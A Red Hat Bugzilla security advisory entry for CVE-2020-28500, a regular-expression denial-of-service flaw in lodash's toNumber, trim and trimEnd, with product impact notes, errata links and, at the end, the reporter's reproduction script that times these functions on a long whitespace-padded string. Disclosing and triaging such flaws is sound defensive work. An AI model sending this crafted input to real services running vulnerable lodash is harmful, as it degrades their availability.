Bug 1928954 (CVE-2020-28500)
| Summary: | CVE-2020-28500 nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions | ||
|---|---|---|---|
| Product: | [Other] Security Response | Reporter: | Guilherme de Almeida Suckevicz <gsuckevi> |
| Component: | vulnerability | Assignee: | Red Hat Product Security <security-response-team> |
| Status: | CLOSED NOTABUG | QA Contact: | |
| Severity: | medium | Docs Contact: | |
| Priority: | medium | ||
| Version: | unspecified | CC: | alazarot, alegrand, anpicker, anstephe, aos-bugs, aturgema, bdettelb, bmontgom, chousekn, cmeyers, davidn, dfediuck, dwhatley, dymurray, eedri, emingora, eparis, erooth, etirelli, extras-orphan, gblomqui, gghezzo, gparvin, ibek, ibolton, ikarpukh, jburrell, jcantril, jcosta, jhadvig, jhardy, jmatthew, jmontleo, jokerman, jramanat, jrokos, jshaughn, jstastny, jweiser, jwendell, kakkoyun, kconner, krathod, kverlaen, lcosic, mabashia, mgoldboi, michal.skrivanek, mnovotny, nodejs-sig, notting, nstielau, osapryki, pjindal, pkrupa, rcernich, rguimara, rpetrell, rrajasek, sbonazzo, sd-operator-metering, sgratch, sherold, slucidi, smcdonal, sponnaga, sseago, stcannon, surbania, swshanka, tflannag, thee, tomckay, twalsh, tzimanyi |
| Target Milestone: | --- | Keywords: | Security |
| Target Release: | --- | ||
| Hardware: | All | ||
| OS: | Linux | ||
| Whiteboard: | |||
| Fixed In Version: | nodejs-lodash-4.17.21 | Doc Type: | If docs needed, set a value |
| Doc Text: |
A flaw was found in nodejs-lodash. A Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions is possible.
|
Story Points: | --- |
| Clone Of: | Environment: | ||
| Last Closed: | 2021-04-13 06:39:06 UTC | Type: | --- |
| Regression: | --- | Mount Type: | --- |
| Documentation: | --- | CRM: | |
| Verified Versions: | Category: | --- | |
| oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
| Cloudforms Team: | --- | Target Upstream Version: | |
| Embargoed: | |||
| Bug Depends On: | 1928955, 1928956, 1929027, 1929028, 1929029, 1930135, 1930136, 1930137, 1930154, 1930155, 1930156, 1930157, 1930158, 1930159, 1930160, 1931277, 1931278, 1931279, 1931280, 1931281, 1931282, 1937751, 1937752, 1937753, 1937955, 1938267, 1938268, 1938269, 2110862 | ||
| Bug Blocks: | 1928940 | ||
Created lodash tracking bugs for this issue: Affects: fedora-32 [bug 1928955] Created nodejs-lodash tracking bugs for this issue: Affects: epel-all [bug 1928956] While Red Hat Quay has a dependency on lodash via restangular it doesn't use the vulnerable toNumber, trim, or trimEnd functions. Upstream fix: https://github.com/lodash/lodash/pull/5065/commits/02906b8191d3c100c193fe6f7b27d1c40f200bb7 [not merged as of yet] Statement: In OpenShift ServiceMesh (OSSM) and Red Hat OpenShift Jaeger (RHOSJ) the affected containers are behind OpenShift OAuth authentication. This restricts access to the vulnerable nodejs-lodash library to authenticated users only, therefore the impact is low. While Red Hat Virtualization's cockpit-ovirt has a dependency on lodash it doesn't use the vulnerable toNumber, trim, or trimEnd functions. While Red Hat Quay has a dependency on lodash via restangular it doesn't use the vulnerable toNumber, trim, or trimEnd functions. Did the code review again and found that though it uses lodash, but Not just the vulnerable functions which cause the ReDOS.Hence, marking it as "Not Affected". This issue has been addressed in the following products: Red Hat Advanced Cluster Management for Kubernetes 2.2 for RHEL 8 Red Hat Advanced Cluster Management for Kubernetes 2.2 for RHEL 7 Via RHSA-2021:1168 https://access.redhat.com/errata/RHSA-2021:1168 This bug is now closed. Further updates for individual products will be reflected on the CVE page(s): https://access.redhat.com/security/cve/cve-2020-28500 This issue has been addressed in the following products: Red Hat Virtualization Engine 4.4 Via RHSA-2021:2179 https://access.redhat.com/errata/RHSA-2021:2179 This issue has been addressed in the following products: Red Hat OpenShift Jaeger 1.20 Via RHSA-2021:2543 https://access.redhat.com/errata/RHSA-2021:2543 This issue has been addressed in the following products: Red Hat OpenShift Container Platform 4.8 Via RHSA-2021:2438 https://access.redhat.com/errata/RHSA-2021:2438 Updated the public data per @btarasso. The public date was incorrectly pointing to date when the vulnerability was disclosed to Snyk, not when it was fixed. This issue has been addressed in the following products: Red Hat Advanced Cluster Management for Kubernetes 2.3 for RHEL 7 Red Hat Advanced Cluster Management for Kubernetes 2.3 for RHEL 8 Via RHSA-2021:3016 https://access.redhat.com/errata/RHSA-2021:3016 This issue has been addressed in the following products: Red Hat Virtualization 4 for Red Hat Enterprise Linux 8 Via RHSA-2021:3459 https://access.redhat.com/errata/RHSA-2021:3459 This issue has been addressed in the following products: Red Hat Migration Toolkit for Containers 1.7 Via RHSA-2022:6429 https://access.redhat.com/errata/RHSA-2022:6429 |
All versions of package lodash; all versions of package org.fujion.webjars:lodash are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions. Steps to reproduce (provided by reporter Liyuan Chen): var lo = require('lodash'); function build_blank (n) { var ret = "1" for (var i = 0; i < n; i++) { ret += " " } return ret + "1"; } var s = build_blank(50000) var time0 = Date.now(); lo.trim(s) var time_cost0 = Date.now() - time0; console.log("time_cost0: " + time_cost0) var time1 = Date.now(); lo.toNumber(s) var time_cost1 = Date.now() - time1; console.log("time_cost1: " + time_cost1) var time2 = Date.now(); lo.trimEnd(s) var time_cost2 = Date.now() - time2; console.log("time_cost2: " + time_cost2) Reference: https://snyk.io/vuln/SNYK-JS-LODASH-1018905